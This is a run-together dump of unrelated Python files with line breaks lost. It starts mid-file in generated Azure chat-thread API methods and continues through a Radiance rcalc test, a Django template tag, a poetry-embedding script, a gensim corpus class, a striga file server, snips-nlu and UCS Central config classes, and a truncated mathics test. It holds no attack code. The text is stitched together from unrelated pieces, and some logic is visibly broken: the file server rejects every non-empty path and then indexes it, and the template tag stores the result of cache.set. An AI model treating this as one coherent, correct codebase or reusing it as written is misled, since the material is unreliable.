chat_thread_id: str :param chat_message_id: The message id. 
:type chat_message_id: str :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" accept = "application/json" # Construct URL url = self.delete_chat_message.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), 'chatMessageId': self._serialize.url("chat_message_id", chat_message_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.delete(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [204]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) delete_chat_message.metadata = {'url': '/chat/threads/{chatThreadId}/messages/{chatMessageId}'} # type: ignore def list_chat_participants( self, chat_thread_id: str, max_page_size: Optional[int] = None, skip: Optional[int] = None, **kwargs: Any ) -> AsyncIterable["_models.ChatParticipantsCollection"]: """Gets the participants of a thread. Gets the participants of a thread. :param chat_thread_id: Thread id to get participants for. :type chat_thread_id: str :param max_page_size: The maximum number of participants to be returned per page. :type max_page_size: int :param skip: Skips participants up to a specified position in response. 
:type skip: int :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either ChatParticipantsCollection or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.communication.chat.models.ChatParticipantsCollection] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.ChatParticipantsCollection"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_chat_participants.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if max_page_size is not None: query_parameters['maxPageSize'] = self._serialize.query("max_page_size", max_page_size, 'int') if skip is not None: query_parameters['skip'] = self._serialize.query("skip", skip, 'int') query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('ChatParticipantsCollection', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_chat_participants.metadata = {'url': '/chat/threads/{chatThreadId}/participants'} # type: ignore async def remove_chat_participant( self, chat_thread_id: str, participant_communication_identifier: "_models.CommunicationIdentifierModel", **kwargs: Any ) -> None: 
"""Remove a participant from a thread. Remove a participant from a thread. :param chat_thread_id: Thread id to remove the participant from. :type chat_thread_id: str :param participant_communication_identifier: Id of the thread participant to remove from the thread. :type participant_communication_identifier: ~azure.communication.chat.models.CommunicationIdentifierModel :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.remove_chat_participant.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(participant_communication_identifier, 'CommunicationIdentifierModel') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [204]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) remove_chat_participant.metadata = {'url': '/chat/threads/{chatThreadId}/participants/:remove'} # type: ignore async def add_chat_participants( self, chat_thread_id: str, add_chat_participants_request: "_models.AddChatParticipantsRequest", **kwargs: Any ) -> "_models.AddChatParticipantsResult": """Adds thread participants to a thread. If participants already exist, no change occurs. Adds thread participants to a thread. If participants already exist, no change occurs. :param chat_thread_id: Id of the thread to add participants to. :type chat_thread_id: str :param add_chat_participants_request: Thread participants to be added to the thread. 
:type add_chat_participants_request: ~azure.communication.chat.models.AddChatParticipantsRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: AddChatParticipantsResult, or the result of cls(response) :rtype: ~azure.communication.chat.models.AddChatParticipantsResult :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.AddChatParticipantsResult"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.add_chat_participants.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(add_chat_participants_request, 'AddChatParticipantsRequest') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [201]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) deserialized = self._deserialize('AddChatParticipantsResult', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized add_chat_participants.metadata = {'url': '/chat/threads/{chatThreadId}/participants/:add'} # type: ignore async def update_chat_thread_properties( self, chat_thread_id: str, update_chat_thread_request: "_models.UpdateChatThreadRequest", **kwargs: Any ) -> None: """Updates a thread's properties. Updates a thread's properties. :param chat_thread_id: The id of the thread to update. :type chat_thread_id: str :param update_chat_thread_request: Request payload for updating a chat thread. 
:type update_chat_thread_request: ~azure.communication.chat.models.UpdateChatThreadRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/merge-patch+json") accept = "application/json" # Construct URL url = self.update_chat_thread_properties.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(update_chat_thread_request, 'UpdateChatThreadRequest') body_content_kwargs['content'] = body_content request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [204]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) update_chat_thread_properties.metadata = {'url': '/chat/threads/{chatThreadId}'} # type: ignore async def get_chat_thread_properties( self, chat_thread_id: str, **kwargs: Any ) -> "_models.ChatThreadProperties": """Gets a chat thread's properties. Gets a chat thread's properties. :param chat_thread_id: Id of the thread. 
:type chat_thread_id: str :keyword callable cls: A custom type or function that will be passed the direct response :return: ChatThreadProperties, or the result of cls(response) :rtype: ~azure.communication.chat.models.ChatThreadProperties :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.ChatThreadProperties"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" accept = "application/json" # Construct URL url = self.get_chat_thread_properties.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.get(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) deserialized = self._deserialize('ChatThreadProperties', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get_chat_thread_properties.metadata = {'url': '/chat/threads/{chatThreadId}'} # type: ignore async def send_typing_notification( self, chat_thread_id: str, send_typing_notification_request: Optional["_models.SendTypingNotificationRequest"] = None, **kwargs: Any ) -> None: """Posts a typing event to a thread, on behalf of a user. Posts a typing event to a thread, on behalf of a user. :param chat_thread_id: Id of the thread. :type chat_thread_id: str :param send_typing_notification_request: Details of the typing notification request. 
:type send_typing_notification_request: ~azure.communication.chat.models.SendTypingNotificationRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.send_typing_notification.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] if send_typing_notification_request is not None: body_content = self._serialize.body(send_typing_notification_request, 'SendTypingNotificationRequest') else: body_content = None body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) send_typing_notification.metadata = {'url': '/chat/threads/{chatThreadId}/typing'} # type: ignore Lilith5th/Radiance # -*- coding: utf-8 -*- from __future__ import division, print_function, unicode_literals # We currently only test for output of recno after receiving a # single column list from cnt(). # This serves to uncover the nl eating bug in buffered pipes # in Visual Studio 2015 before update 2. 
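# Added illustrative note (not part of the original test header): the cases
# below are roughly equivalent to the shell pipeline
#   cnt 5 | rcalc -e '$1=recno'
# which should print the record numbers 1..5 one per line, or emit them as
# packed binary floats/doubles when rcalc is given -of / -od.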
import struct import unittest from pyradlib import lcompare from pyradlib.pyrad_proc import PIPE, Error, ProcMixin class RcalcTestCase(unittest.TestCase, ProcMixin): def _runit(self, cmd1, cmd2, actstr, nl=False): try: procs = self.call_many((cmd1, cmd2), actstr, out=PIPE, universal_newlines=nl) res, eres = procs[-1].communicate() if eres: print('Errors', eres) # XXX except Error as e: self.fail('%s [%s]' % (str(e), self.qjoin(cmd))) finally: for proc in procs: proc.wait() if nl: return [int(s) for s in res.split()] return res #return lcompare.split_rad(raw) def test_recno_oascii(self): for n in (5, 10, 55, 200,1321, 1328,1329,1330,1331,1332, 2000, 3721, 5000,9876): orig = range(n) exp = [i+1 for i in orig] cntcmd = ['cnt', str(n)] aacmd = ['rcalc', '-e', '$1=recno'] aresl = self._runit(cntcmd, aacmd, 'calculate recno', nl=True) try: lcompare.lcompare(aresl, exp) except lcompare.error as e: self.fail(('recno_oascii n=%d -- ' % n) +str(e)) def test_recno_ofloat(self): for n in (5, 10, 55, 200,1321, 1328,1329,1330,1331,1332, 2000, 3721, 5000): orig = range(n) exp = (i+1 for i in orig) cntcmd = ['cnt', str(n)] afcmd = ['rcalc', '-of', '-e', '$1=recno'] res = self._runit(cntcmd, afcmd, 'calculate recno') if len(res) != n * 4: self.fail(('recno_ofloat n=%d -- Length of resulting data ' 'differs from expected (%d != %d)') % (n, len(res), n*4)) iresl = struct.unpack('f'*n, res) try: lcompare.lcompare(iresl, exp) except lcompare.error as e: self.fail(('recno_ofloat n=%d -- ' % n) +str(e)) def test_recno_odouble(self): for n in (5, 10, 55, 200,1321, 1328,1329,1330,1331,1332, 2000, 3721, 5000): orig = range(n) exp = (i+1 for i in orig) cntcmd = ['cnt', str(n)] adcmd = ['rcalc', '-od', '-e', '$1=recno'] res = self._runit(cntcmd, adcmd, 'calculate recno') if len(res) != n * 8: self.fail(('recno_odouble n=%d -- Length of resulting data ' 'differs from expected (%d != %d)') % (n, len(res), n*8)) iresl = struct.unpack('d'*n, res) try: lcompare.lcompare(iresl, exp) except lcompare.error as e: self.fail(('recno_odouble n=%d -- ' % n) +str(e)) # vi: set ts=4 sw=4 : 0 from django import template from django.core.cache import cache from example.models import MyBackground register = template.Library() @register.simple_tag(takes_context=True) def load_error_img(context): cache_key = f"site_error_{context['error_code']}_context" try: context_cache = cache.get(cache_key) except Exception: context_cache = None if context_cache is None: try: custom_context = ( MyBackground.objects.values("image__file") .filter(name=context["error_code"]) .first() ) context_cache = cache.set( cache_key, custom_context["image__file"], timeout=86400 ) return custom_context["image__file"] except Exception as err: print(err) return context_cache or "" extract_poetry_line_feature.py import numpy as np from poetry_handler import read_raw_ccpc, to_lines from pathlib import Path from easydict import EasyDict from utils.config import cfg_from_yaml_file from infer import load_model, encode_texts import torch from tqdm import tqdm if __name__ == '__main__': # all poetry data data = [] test_data = read_raw_ccpc('data/poetry/CCPC/ccpc_test_v1.0.json') data.extend(test_data) train_data = read_raw_ccpc('data/poetry/CCPC/ccpc_train_v1.0.json') data.extend(train_data) valid_data = read_raw_ccpc('data/poetry/CCPC/ccpc_valid_v1.0.json') data.extend(valid_data) # lines = to_lines(data) lines = ['日照香炉生紫烟', '遥看瀑布挂前川', '飞流直下三千尺', '疑是银河落九天', '千呼万唤始出来', '犹抱琵琶半遮面', '转轴拨弦三两声', '未成曲调先有情', '天生丽质难自弃', '一朝选在君王侧', '回眸一笑百媚生', '六宫粉黛无颜色' ] # model config cfg = 
EasyDict() cfg.ROOT_DIR = (Path(__file__).resolve().parent / './').resolve() cfg_from_yaml_file('./cfg/test_xyb.yml', cfg) if torch.cuda.is_available(): torch.cuda.set_device(cfg.DEVICE.GPU) model = load_model(cfg, '../BriVL-pretrain-model/BriVL-1.0-5500w.pth') texts_emb = encode_texts(cfg, lines, model) line_emb_list = [[line, emb] for line, emb in tqdm(zip(lines, texts_emb))] np.save('logs/saves/poetry.npy', line_emb_list) import logging from gensim import utils from gensim.interfaces import CorpusABC from gensim.utils import to_utf8, file_or_filename from smart_open import smart_open class LineCorpus(CorpusABC): """A class for storing corpus as text.""" def __init__(self, input): self.input = input self.length = sum(1 for _ in file_or_filename(self.input)) def __iter__(self): """Yield each document as list of words separated by space.""" with file_or_filename(self.input) as file: for line in file.read().splitlines(): yield [str(byte_word, 'utf-8') for byte_word in line.split()] def __len__(self): """Return the number of documents in corpus.""" return self.length @staticmethod def save_corpus(fname, corpus, id2word=None, progress_cnt=1000, metadata=False): """Store documents one on each line as plain text words.""" logging.info("storing corpus in Line format to %s", fname) def word_id2word(word_id): try: return id2word[word_id] except KeyError: return "" with smart_open(fname, 'wb') as f: if metadata: docno2metadata = {} for docno, doc in enumerate(corpus): if metadata: doc, data = doc docno2metadata[docno] = data if docno % progress_cnt == 0: logging.info("PROGRESS: saving document #%i", docno) fmt = ' '.join(map(word_id2word, doc)) f.write(to_utf8("%s\n" % fmt)) if metadata: utils.pickle(docno2metadata, fname + '.metadata.cpickle') @classmethod def serialize(serializer, fname, corpus, id2word, progress_cnt=None, metadata=False): """Serialize corpus in Line format""" kwargs = {'metadata': metadata} if progress_cnt is not None: kwargs['progress_cnt'] = progress_cnt serializer.save_corpus(fname, corpus, id2word, **kwargs) class id_drive_to_download: ids_dataset={ "csvs_IRT.zip":"1-S_pyKos3lCaTTW6cspF7pHsuQq727WW", "round8_csvs_matriz_porcentajes.zip":"11tJw9FkY1I5hn4AYgzxFPDBE0vlY1HRI" }ateska/striga import os, mimetypes, fnmatch, re, stat, time, logging as L import striga.core.exception ### class Serve(object): ''' Process bus object that sends plain files from disk to client ''' #TODO: Possibility of serving files from subdirectories def __init__(self, rootdir, pattern, buffersize): regex = fnmatch.translate(pattern) self.RootDir = rootdir self.Pattern = re.compile(regex) self.BufferSize = buffersize def __call__(self, ctx, path): if len(path) > 0: raise striga.core.exception.StrigaBusError("NotFound") if self.Pattern.match(path[0]) is None: raise striga.core.exception.StrigaBusError("NotFound") fname = os.path.join(self.RootDir, path[0]) try: fstats = os.stat(fname) except: raise striga.core.exception.StrigaBusError("NotFound") if not stat.S_ISREG(fstats.st_mode): return True fMType, fContentEncoding = mimetypes.guess_type(fname) ctx.res.SetContentType(fMType) ctx.res.SetContentLength(fstats.st_size) ctx.res.CustomHTTPHeader.Set('Last-Modified', time.ctime(fstats.st_mtime)) ctx.res.SetBufferSize(0) #Do not buffer output - writes will be called in large pieces anyway fin = file(fname,'rb') while True: buffer = fin.read(self.BufferSize) if len(buffer) == 0: break ctx.res.Write(buffer) from __future__ import unicode_literals from builtins import map from copy import deepcopy from 
snips_nlu.constants import CUSTOM_ENTITY_PARSER_USAGE from snips_nlu.entity_parser import CustomEntityParserUsage from snips_nlu.pipeline.configs import ProcessingUnitConfig from snips_nlu.pipeline.processing_unit import get_processing_unit_config from snips_nlu.resources import merge_required_resources from snips_nlu.utils import classproperty class NLUEngineConfig(ProcessingUnitConfig): """Configuration of a :class:`.SnipsNLUEngine` object Args: intent_parsers_configs (list): List of intent parser configs (:class:`.ProcessingUnitConfig`). The order in the list determines the order in which each parser will be called by the nlu engine. """ # pylint: disable=super-init-not-called def __init__(self, intent_parsers_configs=None): if intent_parsers_configs is None: from snips_nlu.pipeline.configs import ( ProbabilisticIntentParserConfig, DeterministicIntentParserConfig) intent_parsers_configs = [ DeterministicIntentParserConfig(), ProbabilisticIntentParserConfig() ] self.intent_parsers_configs = list(map(get_processing_unit_config, intent_parsers_configs)) # pylint: enable=super-init-not-called @classproperty def unit_name(cls): # pylint:disable=no-self-argument from snips_nlu.nlu_engine.nlu_engine import SnipsNLUEngine return SnipsNLUEngine.unit_name def get_required_resources(self): # Resolving custom slot values must be done without stemming resources = { CUSTOM_ENTITY_PARSER_USAGE: CustomEntityParserUsage.WITHOUT_STEMS } for config in self.intent_parsers_configs: resources = merge_required_resources( resources, config.get_required_resources()) return resources def to_dict(self): return { "unit_name": self.unit_name, "intent_parsers_configs": [ config.to_dict() for config in self.intent_parsers_configs ] } @classmethod def from_dict(cls, obj_dict): d = obj_dict if "unit_name" in obj_dict: d = deepcopy(obj_dict) d.pop("unit_name") return cls(**d) 0 """This module contains the general information for EquipmentCimcVmedia ManagedObject.""" from ...ucscentralmo import ManagedObject from ...ucscentralcoremeta import UcsCentralVersion, MoPropertyMeta, MoMeta from ...ucscentralmeta import VersionMeta class EquipmentCimcVmediaConsts(): IS_SUPPORTED_FALSE = "false" IS_SUPPORTED_NO = "no" IS_SUPPORTED_TRUE = "true" IS_SUPPORTED_YES = "yes" class EquipmentCimcVmedia(ManagedObject): """This is EquipmentCimcVmedia class.""" consts = EquipmentCimcVmediaConsts() naming_props = set([u'isSupported']) mo_meta = MoMeta("EquipmentCimcVmedia", "equipmentCimcVmedia", "cimcvmediasupp-[is_supported]", VersionMeta.Version121a, "InputOutput", 0x3f, [], [""], [u'equipmentBladeCapProvider', u'equipmentRackUnitCapProvider', u'equipmentServerUnitCapProvider'], [], ["Get"]) prop_meta = { "child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version121a, MoPropertyMeta.INTERNAL, None, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []), "dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version121a, MoPropertyMeta.READ_ONLY, 0x2, 0, 256, None, [], []), "is_supported": MoPropertyMeta("is_supported", "isSupported", "string", VersionMeta.Version121a, MoPropertyMeta.NAMING, 0x4, None, None, None, ["false", "no", "true", "yes"], []), "min_bios_version": MoPropertyMeta("min_bios_version", "minBiosVersion", "string", VersionMeta.Version121a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), "min_cimc_version": MoPropertyMeta("min_cimc_version", "minCimcVersion", "string", VersionMeta.Version121a, MoPropertyMeta.READ_ONLY, None, 0, 
510, None, [], []), "name": MoPropertyMeta("name", "name", "string", VersionMeta.Version121a, MoPropertyMeta.READ_WRITE, 0x8, None, None, r"""[\-\.:_a-zA-Z0-9]{0,16}""", [], []), "rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version121a, MoPropertyMeta.READ_ONLY, 0x10, 0, 256, None, [], []), "status": MoPropertyMeta("status", "status", "string", VersionMeta.Version121a, MoPropertyMeta.READ_WRITE, 0x20, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []), } prop_map = { "childAction": "child_action", "dn": "dn", "isSupported": "is_supported", "minBiosVersion": "min_bios_version", "minCimcVersion": "min_cimc_version", "name": "name", "rn": "rn", "status": "status", } def __init__(self, parent_mo_or_dn, is_supported, **kwargs): self._dirty_mask = 0 self.is_supported = is_supported self.child_action = None self.min_bios_version = None self.min_cimc_version = None self.name = None self.status = None ManagedObject.__init__(self, "EquipmentCimcVmedia", parent_mo_or_dn, **kwargs) from .helper import evaluate, session from mathics.builtin.base import BoxConstruct, Predefined from mathics.builtin.graphics import GRAPHICS_OPTIONS from mathics.core.attributes import hold_all, protected, read_protected class CustomBoxConstruct(BoxConstruct): def __init__(self, evaluation): super().__init__(evaluation=evaluation) self._elements = [1, 2, 3] def boxes_to_text(self, leaves=None, **options): if not leaves: leaves = self._elements return "CustomBoxConstruct<<" + self._elements.__str__() + ">>" def boxes_to_mathml(self, leaves=None, **options): if not leaves: leaves = self._elements return "CustomBoxConstruct<<" + self._elements.__str__() + ">>" def boxes_to_tex(self, leaves=None, **options): if not leaves: leaves = self._elements return "CustomBoxConstruct<<" + int(self._elements) + ">>" class CustomAtom(Predefined): """ just a test """ context = "System`" rules = { "N[System`CustomAtom]": "37", } def apply_to_boxes(self, evaluation): "System`MakeBoxes[System`CustomAtom, StandardForm|TraditionalForm|OutputForm|InputForm]" return CustomBoxConstruct(evaluation=evaluation) class CustomGraphicsBox(BoxConstruct): """""" options = GRAPHICS_OPTIONS attributes = hold_all | protected | read_protected def apply_box(self, elems, evaluation, options): """System`MakeBoxes[System`Graphics[elems_, System`OptionsPattern[System`Graphics]], System`StandardForm|System`TraditionalForm|System`OutputForm]""" instance = CustomGraphicsBox(*(elems._elements), evaluation=evaluation) return instance def boxes_to_text(self, leaves=None, **options): if leaves: self._elements = leaves return ( "--custom graphics--: I should plot " + self._elements.__str__() + " items" ) def boxes_to_tex(self, leaves=None, **options): return ( "--custom graphics--: I should plot " + self._elements.__str__() + " items" ) def boxes_to_mathml(self, leaves=None, **options): return ( "--custom graphics--: I should plot " + self._elements.__str__() + " items" ) def boxes_to_svg(self, evaluation): return ( "--custom graphics--: I should plot " + self._elements.__str__() + " items" ) def test_custom_boxconstruct(): defs = session.evaluation.definitions instance_custom_atom = CustomAtom(expression=False) instance_custom_atom.contribute(defs, is_pymodule=True) evaluate("MakeBoxes[CustomAtom, InputForm]") formatted = session.format_result().boxes_to_mathml() assert formatted == "CustomBoxConstruct<<[1, 2, 3]>>" def test_custom_graphicsbox_constructor(): defs = session.evaluation.definitions 
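# Added note: register the custom graphics box with the session definitions,
# format a Graphics expression through MakeBoxes, and check only the
# placeholder string that boxes_to_mathml() returns.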
